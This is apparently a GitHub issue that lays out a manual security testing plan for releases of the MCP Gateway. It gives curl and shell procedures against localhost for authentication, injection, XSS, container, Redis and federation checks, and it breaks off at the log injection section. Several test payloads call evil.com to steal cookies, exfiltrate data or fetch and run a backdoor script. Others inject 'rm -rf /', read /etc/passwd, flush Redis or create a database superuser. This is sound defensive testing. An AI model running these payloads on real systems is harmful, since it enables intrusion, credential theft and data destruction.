[CHORE]: Manual security testing plan and template for release validation and production deployments #260
Description
🔍 Chore Summary
Implement comprehensive manual security testing procedures for MCP Gateway release validation: establish thorough security validation checklists covering authentication bypass testing, business logic exploitation, infrastructure hardening verification, federation security assessment, and compliance evidence collection to ensure zero critical security vulnerabilities reach production through manual white-box and black-box testing methodologies.
🧱 Areas Affected
- Authentication & authorization mechanisms (JWT, Basic Auth, session management)
- Business logic security (JSON-RPC, JSONPath, MCP protocol compliance)
- Network & transport security (TLS, CORS, headers, WebSocket/SSE)
- Data handling & injection prevention (SQL, NoSQL, XSS, command injection)
- Configuration & infrastructure security (secrets, environment, containers)
- Federation & integration security (peer gateways, Redis, tool discovery)
- Deployment security (Docker, Kubernetes, privilege escalation)
- Monitoring & incident response validation
- Compliance documentation and evidence generation
⚙️ Context / Rationale
Manual security testing goes beyond automated SAST/DAST tools to validate complex business logic, configuration security, and real-world attack scenarios that require human intuition and domain knowledge. This comprehensive manual testing plan ensures that every MCP Gateway release is thoroughly validated against sophisticated attack vectors, misconfigurations, and integration vulnerabilities before reaching production environments.
Manual Security Testing Methodology:
graph TD
A[Manual Security Testing] --> B[Authentication Security]
A --> C[Business Logic Testing]
A --> D[Infrastructure Security]
A --> E[Federation Security]
B --> B1[JWT Lifecycle Testing]
B --> B2[Session Management]
B --> B3[Privilege Escalation]
B --> B4[Credential Stuffing]
C --> C1[JSON-RPC Protocol Abuse]
C --> C2[JSONPath Injection]
C --> C3[MCP Compliance Testing]
C --> C4[Rate Limiting Bypass]
D --> D1[Container Security]
D --> D2[TLS Configuration]
D --> D3[Environment Security]
D --> D4[Database Hardening]
E --> E1[Peer Gateway Trust]
E --> E2[Redis Security]
E --> E3[Tool Discovery Abuse]
E --> E4[Federation Attacks]
📦 Related Make Targets
| Target | Purpose |
|---|---|
make security-manual-all |
Run complete manual security testing suite |
make security-manual-auth |
Manual authentication and authorization testing |
make security-manual-logic |
Business logic and protocol security testing |
make security-manual-infra |
Infrastructure and configuration security testing |
make security-manual-fed |
Federation and integration security testing |
make security-manual-setup |
Setup test environments and generate test data |
make security-manual-report |
Generate manual testing evidence and compliance report |
make security-manual-clean |
Clean manual testing artifacts and test environments |
Bold targets are mandatory for release validation; all manual tests must pass with documented evidence.
📋 Acceptance Criteria
- Authentication testing validates JWT lifecycle, session security, and credential protection with 0 bypass vulnerabilities.
- Authorization testing confirms proper access controls across all endpoints and admin functions.
- Business logic testing validates JSON-RPC security, JSONPath injection prevention, and MCP protocol compliance.
- Infrastructure testing confirms container security, TLS configuration, and secrets management.
- Federation testing validates peer gateway trust, Redis security, and tool discovery protection.
- Configuration auditing ensures production-ready security settings and hardening.
- Attack simulation demonstrates resistance to real-world exploitation scenarios.
- Compliance evidence documents all testing procedures and results for audit purposes.
- Remediation tracking ensures all identified issues are resolved before release.
- Testing artifacts preserved for security team review and future regression testing.
🛠️ Manual Security Testing Plan
1. 🔐 Authentication & Session Security
JWT Token Lifecycle Testing
Objective: Validate JWT token creation, validation, expiry, and refresh mechanisms
Tools Required:
jwt.iodecodercurlorhttpiejqfor JSON parsing- Browser developer tools
- Custom JWT manipulation scripts
Test Procedures:
1.1 JWT Token Generation and Validation
# Test JWT token creation
export JWT_TOKEN=$(python3 -m mcpgateway.utils.create_jwt_token \
--username admin --exp 0 --secret my-test-key)
echo "Generated JWT: $JWT_TOKEN"
# Decode and inspect token structure
echo $JWT_TOKEN | cut -d. -f2 | base64 -d | jq .
# Test API access with valid token
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/admin/tools | jq .Expected Result: ✅ Valid token grants access, proper payload structure
Security Issue: ❌ Malformed tokens accepted, missing signature validation
1.2 JWT Token Expiry Testing
# Generate expired token
export EXPIRED_JWT=$(python3 -m mcpgateway.utils.create_jwt_token \
--username admin --exp -3600 --secret my-test-key)
# Test API access with expired token
curl -H "Authorization: Bearer $EXPIRED_JWT" \
http://localhost:4444/admin/tools
# Test token with future expiry
export FUTURE_JWT=$(python3 -m mcpgateway.utils.create_jwt_token \
--username admin --exp 86400 --secret my-test-key)
curl -H "Authorization: Bearer $FUTURE_JWT" \
http://localhost:4444/admin/toolsExpected Result: ✅ Expired tokens rejected with 401, future tokens accepted
Security Issue: ❌ Expired tokens accepted, no expiry validation
1.3 JWT Secret Key Testing
# Test with wrong secret key
export WRONG_SECRET_JWT=$(python3 -c "
import jwt
payload = {'username': 'admin', 'exp': 9999999999}
token = jwt.encode(payload, 'wrong-secret', algorithm='HS256')
print(token)
")
curl -H "Authorization: Bearer $WRONG_SECRET_JWT" \
http://localhost:4444/admin/tools
# Test algorithm confusion attack (RS256 vs HS256)
export ALG_CONFUSION_JWT=$(python3 -c "
import jwt
payload = {'username': 'admin', 'exp': 9999999999}
token = jwt.encode(payload, 'my-test-key', algorithm='RS256')
print(token)
")
curl -H "Authorization: Bearer $ALG_CONFUSION_JWT" \
http://localhost:4444/admin/toolsExpected Result: ✅ Wrong secret/algorithm tokens rejected with 401
Security Issue: ❌ Algorithm confusion accepted, weak secret validation
Basic Authentication Testing
1.4 Basic Auth Credential Testing
# Test valid credentials
curl -u admin:changeme http://localhost:4444/admin/tools
# Test invalid credentials
curl -u admin:wrongpass http://localhost:4444/admin/tools
curl -u wronguser:changeme http://localhost:4444/admin/tools
# Test credential stuffing common passwords
for password in password 123456 admin root; do
echo "Testing password: $password"
curl -u admin:$password http://localhost:4444/admin/tools
done
# Test timing attack resistance
time curl -u admin:wrongpass http://localhost:4444/admin/tools
time curl -u admin:changeme http://localhost:4444/admin/toolsExpected Result: ✅ Only valid credentials accepted, consistent timing
Security Issue: ❌ Weak passwords accepted, timing attack vulnerability
1.5 Session Management Testing
# Test session persistence across requests
curl -c cookies.txt -b cookies.txt -u admin:changeme \
http://localhost:4444/admin/tools
# Test session fixation
curl -c session1.txt http://localhost:4444/admin
curl -b session1.txt -u admin:changeme http://localhost:4444/admin/tools
# Test concurrent sessions
curl -c session1.txt -u admin:changeme http://localhost:4444/admin/tools &
curl -c session2.txt -u admin:changeme http://localhost:4444/admin/tools &
waitExpected Result: ✅ Proper session handling, no session fixation
Security Issue: ❌ Session fixation possible, concurrent session issues
Authentication Bypass Testing
1.6 Header Manipulation Testing
# Test missing Authorization header
curl http://localhost:4444/admin/tools
# Test malformed Authorization headers
curl -H "Authorization: Basic invalid" http://localhost:4444/admin/tools
curl -H "Authorization: Bearer" http://localhost:4444/admin/tools
curl -H "Authorization: Digest username=admin" http://localhost:4444/admin/tools
# Test header injection
curl -H "Authorization: Bearer ${JWT_TOKEN}${CRLF}X-Admin: true" \
http://localhost:4444/admin/tools
# Test case sensitivity bypass
curl -h "authorization: Bearer $JWT_TOKEN" http://localhost:4444/admin/tools
curl -H "AUTHORIZATION: Bearer $JWT_TOKEN" http://localhost:4444/admin/toolsExpected Result: ✅ All unauthorized requests rejected with 401
Security Issue: ❌ Header manipulation bypasses authentication
1.7 Path Traversal and Method Override Testing
# Test auth bypass via path manipulation
curl http://localhost:4444/../admin/tools
curl http://localhost:4444/admin/../admin/tools
curl http://localhost:4444/admin/tools/../servers
# Test HTTP method override
curl -X POST -H "X-HTTP-Method-Override: GET" \
http://localhost:4444/admin/tools
# Test auth bypass via HTTP verbs
curl -X TRACE http://localhost:4444/admin/tools
curl -X OPTIONS http://localhost:4444/admin/tools
curl -X HEAD http://localhost:4444/admin/toolsExpected Result: ✅ Path manipulation blocked, method override secured
Security Issue: ❌ Authentication bypass via path or method manipulation
2. 🛡️ Authorization & Access Control
Role-Based Access Control Testing
2.1 Admin Endpoint Access Control
# Test admin endpoints require authentication
endpoints=(
"/admin/tools"
"/admin/servers"
"/admin/resources"
"/admin/prompts"
"/admin/gateways"
"/metrics"
"/health"
)
for endpoint in "${endpoints[@]}"; do
echo "Testing $endpoint without auth:"
curl -w "Status: %{http_code}\n" http://localhost:4444$endpoint
done
# Test with authentication
for endpoint in "${endpoints[@]}"; do
echo "Testing $endpoint with auth:"
curl -w "Status: %{http_code}\n" \
-H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444$endpoint
doneExpected Result: ✅ Protected endpoints require authentication
Security Issue: ❌ Admin endpoints accessible without authentication
2.2 Cross-User Data Access Testing
# Create test user token
export USER_JWT=$(python3 -m mcpgateway.utils.create_jwt_token \
--username testuser --exp 3600 --secret my-test-key)
# Test if user can access admin functions
curl -H "Authorization: Bearer $USER_JWT" \
http://localhost:4444/admin/tools
# Test user isolation (if multi-tenant)
curl -H "Authorization: Bearer $USER_JWT" \
http://localhost:4444/admin/tools/1
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/admin/tools/1Expected Result: ✅ Users cannot access unauthorized resources
Security Issue: ❌ Cross-user data access possible
Privilege Escalation Testing
2.3 Horizontal Privilege Escalation
# Test modifying other users' resources (if applicable)
curl -X PUT -H "Authorization: Bearer $USER_JWT" \
-H "Content-Type: application/json" \
-d '{"name":"malicious-tool","url":"http://evil.com"}' \
http://localhost:4444/admin/tools/1
# Test accessing other users' data
curl -H "Authorization: Bearer $USER_JWT" \
"http://localhost:4444/admin/tools?user_id=admin"2.4 Vertical Privilege Escalation
# Test elevating to admin privileges
curl -X POST -H "Authorization: Bearer $USER_JWT" \
-H "Content-Type: application/json" \
-d '{"username":"testuser","role":"admin"}' \
http://localhost:4444/admin/users
# Test admin function access
curl -X DELETE -H "Authorization: Bearer $USER_JWT" \
http://localhost:4444/admin/tools/1Expected Result: ✅ Privilege escalation attempts blocked
Security Issue: ❌ Users can escalate privileges or access admin functions
3. 🌐 Network & Transport Security
TLS/SSL Configuration Testing
3.1 Certificate Validation Testing
# Test TLS configuration (if HTTPS enabled)
openssl s_client -connect localhost:4444 -servername localhost
# Test cipher suite strength
nmap --script ssl-enum-ciphers -p 4444 localhost
# Test SSL/TLS vulnerabilities
nmap --script ssl-* -p 4444 localhost
# Test certificate chain
curl -vI https://localhost:4444/ 2>&1 | grep -E "(certificate|SSL|TLS)"Expected Result: ✅ Strong TLS configuration, valid certificates
Security Issue: ❌ Weak ciphers, invalid certificates, TLS vulnerabilities
3.2 HTTP Security Headers Testing
# Test security headers presence
curl -I http://localhost:4444/
# Test specific security headers
headers=(
"Strict-Transport-Security"
"Content-Security-Policy"
"X-Frame-Options"
"X-Content-Type-Options"
"X-XSS-Protection"
"Referrer-Policy"
)
for header in "${headers[@]}"; do
echo "Testing for $header:"
curl -I http://localhost:4444/ | grep -i "$header"
done
# Test CORS configuration
curl -H "Origin: http://evil.com" \
-H "Access-Control-Request-Method: POST" \
-H "Access-Control-Request-Headers: Authorization" \
-X OPTIONS http://localhost:4444/admin/toolsExpected Result: ✅ All security headers present, proper CORS configuration
Security Issue: ❌ Missing security headers, permissive CORS
WebSocket and SSE Security Testing
3.3 WebSocket Security Testing
# Test WebSocket authentication
wscat -c ws://localhost:4444/ws
# Test WebSocket with authentication
wscat -c ws://localhost:4444/ws \
-H "Authorization: Bearer $JWT_TOKEN"
# Test WebSocket message injection
echo '{"type":"malicious","data":"<script>alert(1)</script>"}' | \
wscat -c ws://localhost:4444/ws -H "Authorization: Bearer $JWT_TOKEN"
# Test WebSocket protocol confusion
wscat -c ws://localhost:4444/ws \
-H "Sec-WebSocket-Protocol: malicious-protocol"3.4 Server-Sent Events (SSE) Security Testing
# Test SSE authentication
curl -N -H "Accept: text/event-stream" \
http://localhost:4444/sse
# Test authenticated SSE access
curl -N -H "Accept: text/event-stream" \
-H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/sse
# Test SSE message injection
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{"message":"data: <script>alert(1)</script>\n\n"}' \
http://localhost:4444/messageExpected Result: ✅ WebSocket/SSE require authentication, messages sanitized
Security Issue: ❌ Unauthenticated access, message injection possible
4. 🧠 Business Logic & Protocol Security
JSON-RPC Protocol Security Testing
4.1 JSON-RPC Request Validation
# Test malformed JSON-RPC requests
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"invalid":"request"}' \
http://localhost:4444/rpc
# Test missing required fields
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","id":1}' \
http://localhost:4444/rpc
# Test invalid JSON-RPC version
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"1.0","method":"ping","id":1}' \
http://localhost:4444/rpc
# Test protocol confusion attacks
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"3.0","method":"system.exit","id":1}' \
http://localhost:4444/rpc4.2 JSON-RPC Method Security Testing
# Test unauthorized method access
dangerous_methods=(
"system.exit"
"os.system"
"eval"
"__import__"
"exec"
"file.read"
"../admin/delete_all"
)
for method in "${dangerous_methods[@]}"; do
echo "Testing dangerous method: $method"
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d "{\"jsonrpc\":\"2.0\",\"method\":\"$method\",\"id\":1}" \
http://localhost:4444/rpc
done
# Test method parameter injection
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","method":"tools/call","params":{"name":"tool; rm -rf /"},"id":1}' \
http://localhost:4444/rpc4.3 JSONPath Injection Testing
# Test JSONPath expression injection
malicious_paths=(
'$..*'
'$[*]'
'$..password'
'$..secret'
'$..[?(@.admin==true)]'
'$..* | select(.type=="admin")'
)
for path in "${malicious_paths[@]}"; do
echo "Testing JSONPath: $path"
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d "{\"jsonrpc\":\"2.0\",\"method\":\"resources/read\",\"params\":{\"uri\":\"config.json\",\"filter\":\"$path\"},\"id\":1}" \
http://localhost:4444/rpc
done
# Test JSONPath DoS attacks
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","method":"resources/read","params":{"filter":"$..['$(python3 -c "print('a' * 10000)")']"},"id":1}' \
http://localhost:4444/rpcMCP Protocol Compliance Testing
4.4 MCP Initialization Security
# Test MCP initialization with malicious parameters
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{
"jsonrpc": "2.0",
"method": "initialize",
"params": {
"protocolVersion": "../../etc/passwd",
"capabilities": {
"tools": {"listChanged": true}
},
"clientInfo": {
"name": "<script>alert(1)</script>",
"version": "'; rm -rf / ; echo '"
}
},
"id": 1
}' \
http://localhost:4444/rpc
# Test protocol version confusion
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","method":"initialize","params":{"protocolVersion":"1.0.0"},"id":1}' \
http://localhost:4444/rpc4.5 Tool and Resource Security Testing
# Test malicious tool registration
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "legitimate-tool",
"url": "http://localhost:8080/../../etc/passwd",
"description": "<script>document.location=\"http://evil.com/\"+document.cookie</script>",
"auth_type": "bearer",
"auth_value": "token; curl http://evil.com/steal?data="
}' \
http://localhost:4444/admin/tools
# Test resource access control bypass
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","method":"resources/read","params":{"uri":"file:///etc/passwd"},"id":1}' \
http://localhost:4444/rpc5. 📊 Data Handling & Injection Security
SQL Injection Testing
5.1 Database Injection Testing
# Test SQL injection in tool names
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "tool'\'' OR 1=1--",
"url": "http://example.com",
"description": "test"
}' \
http://localhost:4444/admin/tools
# Test SQL injection in search parameters
curl -H "Authorization: Bearer $JWT_TOKEN" \
"http://localhost:4444/admin/tools?search=test'%20OR%201=1--"
# Test blind SQL injection
curl -H "Authorization: Bearer $JWT_TOKEN" \
"http://localhost:4444/admin/tools?search=test'%20AND%20(SELECT%20SLEEP(5))--"
# Test union-based SQL injection
curl -H "Authorization: Bearer $JWT_TOKEN" \
"http://localhost:4444/admin/tools?search=test'%20UNION%20SELECT%20*%20FROM%20users--"5.2 NoSQL Injection Testing (if using MongoDB/Redis)
# Test NoSQL injection in JSON parameters
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": {"$gt": ""},
"url": "http://example.com"
}' \
http://localhost:4444/admin/tools
# Test MongoDB operator injection
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"filter": {"$where": "this.name == this.name"},
"query": {"$regex": ".*"}
}' \
http://localhost:4444/admin/toolsCross-Site Scripting (XSS) Testing
5.3 Stored XSS Testing
# Test stored XSS in tool descriptions
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "xss-test",
"url": "http://example.com",
"description": "<script>alert('\''XSS'\'')</script>"
}' \
http://localhost:4444/admin/tools
# Test stored XSS in server names
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "<img src=x onerror=alert(1)>",
"url": "http://example.com"
}' \
http://localhost:4444/admin/servers
# Verify XSS execution by browsing admin UI
echo "Browse to http://localhost:4444/admin and check for XSS execution"5.4 Reflected XSS Testing
# Test reflected XSS in error messages
curl -H "Authorization: Bearer $JWT_TOKEN" \
"http://localhost:4444/admin/tools?error=<script>alert('XSS')</script>"
# Test XSS in JSON-RPC responses
curl -X POST -H "Content-Type: application/json" \
-H "Authorization: Bearer $JWT_TOKEN" \
-d '{"jsonrpc":"2.0","method":"<script>alert(1)</script>","id":1}' \
http://localhost:4444/rpcCommand Injection Testing
5.5 OS Command Injection
# Test command injection in tool URLs
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "cmd-inject",
"url": "http://example.com; wget http://evil.com/backdoor.sh; chmod +x backdoor.sh; ./backdoor.sh",
"description": "test"
}' \
http://localhost:4444/admin/tools
# Test command injection in environment variables
export MALICIOUS_ENV="test; curl http://evil.com/exfiltrate"
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "env-inject",
"url": "http://example.com",
"env": {"PATH": "'$MALICIOUS_ENV'"}
}' \
http://localhost:4444/admin/tools6. ⚙️ Configuration & Infrastructure Security
Environment Variable Security
6.1 Secrets Exposure Testing
# Test for exposed environment variables
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/health
# Test debug endpoints that might expose config
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/debug/config
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/debug/env
# Test for configuration file access
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/.env
curl -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/config.py6.2 Default Configuration Testing
# Check for default/weak credentials
python3 -c "
import os
from mcpgateway.config import Settings
settings = Settings()
print('🔍 Configuration Security Check:')
print(f'Basic Auth User: {settings.basic_auth_user}')
print(f'Basic Auth Password: {settings.basic_auth_password}')
print(f'JWT Secret: {settings.jwt_secret_key}')
print(f'Auth Required: {settings.auth_required}')
print(f'Skip SSL Verify: {settings.skip_ssl_verify}')
# Flag potential security issues
if settings.basic_auth_password == 'changeme':
print('❌ SECURITY ISSUE: Default password detected')
if settings.jwt_secret_key == 'my-test-key':
print('❌ SECURITY ISSUE: Default JWT secret detected')
if not settings.auth_required:
print('❌ SECURITY ISSUE: Authentication disabled')
if settings.skip_ssl_verify:
print('❌ SECURITY ISSUE: SSL verification disabled')
"
# Test configuration manipulation via environment
AUTH_REQUIRED=false python3 -m mcpgateway.main &
sleep 5
curl http://localhost:4444/admin/tools
pkill -f mcpgateway || trueContainer Security Testing
6.3 Docker Container Security
# Test container privilege escalation
docker run --rm -it mcpgateway:latest whoami
docker run --rm -it mcpgateway:latest ps aux
docker run --rm -it mcpgateway:latest ls -la /
# Test container escape attempts
docker run --rm -it mcpgateway:latest find / -perm -u=s -type f 2>/dev/null
# Test volume mount security
docker run --rm -it -v /:/hostfs mcpgateway:latest ls -la /hostfs
# Test network isolation
docker run --rm mcpgateway:latest netstat -tulpn
docker run --rm mcpgateway:latest ss -tulpn
# Test secret exposure in container
docker inspect mcpgateway:latest | grep -i -E "(secret|password|token|key)"6.4 Kubernetes Security Testing (if applicable)
# Test pod security context
kubectl describe pod mcpgateway-pod | grep -A 10 "Security Context"
# Test RBAC permissions
kubectl auth can-i --list --as=system:serviceaccount:default:mcpgateway
# Test network policies
kubectl get networkpolicies
kubectl describe networkpolicy mcpgateway-netpol
# Test secrets exposure
kubectl get secrets
kubectl describe secret mcpgateway-secretsDatabase Security Testing
6.5 SQLite Security Testing
# Test SQLite file permissions
ls -la mcp.db
stat mcp.db
# Test direct database access
sqlite3 mcp.db "SELECT name FROM sqlite_master WHERE type='table';"
sqlite3 mcp.db "PRAGMA table_info(users);"
# Test database backup security
sqlite3 mcp.db ".backup backup.db"
ls -la backup.db
# Test SQL injection at database level
sqlite3 mcp.db "SELECT * FROM tools WHERE name = 'test' OR '1'='1';"6.6 PostgreSQL Security Testing (if enabled)
# Test PostgreSQL connection security
psql $DATABASE_URL -c "SELECT current_user, current_database();"
# Test privilege escalation
psql $DATABASE_URL -c "CREATE USER hacker WITH SUPERUSER PASSWORD 'hack123';"
# Test data access controls
psql $DATABASE_URL -c "SELECT * FROM information_schema.tables;"
psql $DATABASE_URL -c "SELECT * FROM pg_user;"6.7 🔌 Management-Surface Disable Tests
These checks prove that turning off the Admin UI or Admin API truly removes every management entry-point (no soft-404s, no static assets, no pre-flight CORS leaks).
| Toggle | Off-Value | Expected result |
|---|---|---|
MCPGATEWAY_UI_ENABLED |
false |
• /admin/* routes 404• /static/admin.* assets 404 |
MCPGATEWAY_ADMIN_API_ENABLED |
false |
• /admin/* JSON endpoints 404• public /health, /rpc still 200 |
# 6.7.1 Only UI off
MCPGATEWAY_UI_ENABLED=false make run-dev &
sleep 3
for path in /admin /admin/tools /static/admin.css; do
curl -s -o /dev/null -w "$path → %{http_code}\n" http://localhost:4444$path
done
pkill -f run-dev
# 6.7.2 Only API off
MCPGATEWAY_ADMIN_API_ENABLED=false make run-dev &
sleep 3
curl -s -o /dev/null -w "/admin/tools → %{http_code}\n" \
-u admin:changeme http://localhost:4444/admin/tools
curl -s -o /dev/null -w "/health → %{http_code}\n" \
http://localhost:4444/health
pkill -f run-dev
# 6.7.3 Both off
MCPGATEWAY_UI_ENABLED=false MCPGATEWAY_ADMIN_API_ENABLED=false make run-dev &
sleep 3
curl -s -o /dev/null -w "/admin → %{http_code}\n" \
http://localhost:4444/admin
curl -s -o /dev/null -w "/docs → %{http_code}\n" \
http://localhost:4444/docs # should stay 200
pkill -f run-dev6.8 🔒 CORS & Origin Hardening
# 6.8.1 Origin list must be strict JSON, no "*"
python - <<'PY'
import json, os, re, sys
orig=os.getenv("ALLOWED_ORIGINS",'[]')
try: data=json.loads(orig)
except json.JSONDecodeError: sys.exit("❌ ALLOWED_ORIGINS bad JSON")
if "*" in data: sys.exit("❌ wildcard origin")
bad=[o for o in data if not re.match(r'^https?://[^/]+$',o)]
if bad: sys.exit(f"❌ invalid origin(s): {bad}")
print("✅ CORS origin list sane")
PY
# 6.8.2 Warn if CORS disabled unexpectedly
[ "$CORS_ENABLED" = "true" ] || echo "⚠️ CORS disabled – API will be same-origin only"
# 6.8.3 TLS verification must stay on in prod
[ "$SKIP_SSL_VERIFY" = "false" ] || echo "❌ SKIP_SSL_VERIFY=true – MITM risk"6.9 🌐 Transport-Exposure Controls
TRANSPORT_TYPE |
Expected open endpoints |
|---|---|
http |
/rpc only (no /ws, /sse) |
ws |
/ws only (HTTP /rpc → 501) |
sse |
/sse only |
all (default) |
all three |
# 6.9.1 Probe transports quickly
for ep in rpc ws sse; do
printf "%-3s: " $ep
case $ep in
rpc) curl -s -o /dev/null -w '%{http_code}\n' http://localhost:4444/rpc ;;
ws) websocat -1 ws://localhost:4444/ws >/dev/null 2>&1 && echo open || echo closed ;;
sse) curl -m2 -sN http://localhost:4444/sse | head -c1 && echo open || echo closed ;;
esac
done6.10 🛡️ Federation & Discovery Toggles
# 6.10.1 Ensure no gossip when federation disabled
FEDERATION_ENABLED=false make run-dev &
sleep 3
curl -s http://localhost:4444/admin/gateways | jq '.total' | grep -q '^0$' \
|| echo "❌ gateways still listed"
pkill -f run-dev6.11 📦 Cache / Redis Security
# 6.11.1 Require auth & db index on Redis URL
if [[ "$CACHE_TYPE" == "redis" ]]; then
[[ "$REDIS_URL" =~ ^redis://[^:@]+:[0-9]+/[0-9]+$ ]] \
|| echo "❌ REDIS_URL missing password or DB index"
fi6.12 🗜️ Logging & Verbosity
# 6.12.1 Prod log level must be WARNING+
[[ "$LOG_LEVEL" =~ ^(WARNING|ERROR|CRITICAL)$ ]] \
|| echo "⚠️ LOG_LEVEL=$LOG_LEVEL – prefer WARNING or higher"
# 6.12.2 Scan recent logs for secrets
grep -iE "(changeme|my-test-key|password|secret)" logs/gateway.log && \
echo "❌ Sensitive value leaked to logs"6.13 🐛 Dev/Debug Flags Must Be Off
for v in DEV_MODE RELOAD DEBUG; do
[ "${!v}" = "false" ] || echo "❌ $v enabled in prod"
done6.14 🚦 Rate-Limit & Timeout Sanity
python - <<'PY'
import os, sys
rl=int(os.getenv("TOOL_RATE_LIMIT","100"))
cc=int(os.getenv("TOOL_CONCURRENT_LIMIT","10"))
if rl>1000 or cc>100:
sys.exit(f"❌ limits too high (rate={rl}, concur={cc})")
print("✅ limits sane")
PY6.15 🔑 Secret Entropy Audit
python - <<'PY'
import os, sys
for name in ("JWT_SECRET_KEY","AUTH_ENCRYPTION_SECRET"):
val=os.getenv(name,"")
if len(val)<32 or val in ("my-test-key","my-test-salt"):
sys.exit(f"❌ {name} weak")
print("✅ secrets strong")
PY6.16 🗝️ File-Permission Checks
for f in .env mcp.db logs/gateway.log; do
[ -e "$f" ] || continue
perm=$(stat -c %a "$f")
[ "$perm" -le 600 ] || echo "❌ $f perms $perm – set to 600"
done6.17 🛠️ CI “Meta-Audit” Helper
#!/usr/bin/env bash
set -euo pipefail
echo "🔍 .env hardening audit"
source .env
for test in 6.7 6.8 6.9 6.10 6.11 6.12 6.13 6.14 6.15 6.16; do
bash tests/env_hardening/${test}.sh
done
echo "✅ all .env security checks passed"Pass criteria
- UI/Admin endpoints unreachable when toggled off.
- No wild-card CORS, dev flags, weak secrets, or permissive logs.
- All scripts exit
0.
7. 🔗 Federation & Integration Security
Peer Gateway Security Testing
7.1 Gateway Federation Trust Testing
# Test malicious peer gateway registration
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "evil-gateway",
"url": "http://evil.com:4444",
"trust_level": "high"
}' \
http://localhost:4444/admin/gateways
# Test peer gateway certificate validation
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "untrusted-gateway",
"url": "https://self-signed.badssl.com:4444"
}' \
http://localhost:4444/admin/gateways
# Test federation data integrity
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "mitm-gateway",
"url": "http://192.168.1.100:4444"
}' \
http://localhost:4444/admin/gateways7.2 Tool Discovery Security Testing
# Test malicious tool discovery responses
# Start mock malicious gateway
python3 -c "
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
class MaliciousHandler(BaseHTTPRequestHandler):
def do_GET(self):
if '/tools' in self.path:
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
malicious_tools = {
'tools': [{
'name': '../../../etc/passwd',
'url': 'file:///etc/passwd',
'description': '<script>alert(1)</script>'
}]
}
self.wfile.write(json.dumps(malicious_tools).encode())
server = HTTPServer(('localhost', 8999), MaliciousHandler)
print('Starting malicious gateway on :8999')
server.serve_forever()
" &
# Register malicious gateway
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "malicious-discovery",
"url": "http://localhost:8999"
}' \
http://localhost:4444/admin/gateways
# Trigger tool discovery
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
http://localhost:4444/admin/gateways/discover
pkill -f "http.server" || trueRedis Security Testing
7.3 Redis Cache Security
# Test Redis connection security (if Redis enabled)
redis-cli ping
# Test Redis authentication
redis-cli -a wrongpassword ping
# Test Redis data exposure
redis-cli keys "*"
redis-cli get mcpgateway:session:*
redis-cli get mcpgateway:auth:*
# Test Redis command injection
redis-cli eval "redis.call('flushall')" 0
# Test Redis unauthorized access
telnet localhost 6379 << EOF
ping
keys *
config get *
quit
EOF7.4 Cache Poisoning Testing
# Test cache poisoning via malicious responses
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"method": "resources/read",
"params": {
"uri": "http://localhost:8999/malicious-resource",
"cache": true
},
"id": 1
}' \
http://localhost:4444/rpc
# Test cache key collision
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"method": "resources/read",
"params": {
"uri": "legitimate-resource",
"cache_key": "admin:secrets"
},
"id": 1
}' \
http://localhost:4444/rpc8. 📈 Monitoring & Incident Response
Logging Security Testing
8.1 Log Injection Testing
# Test log injection via user inputs
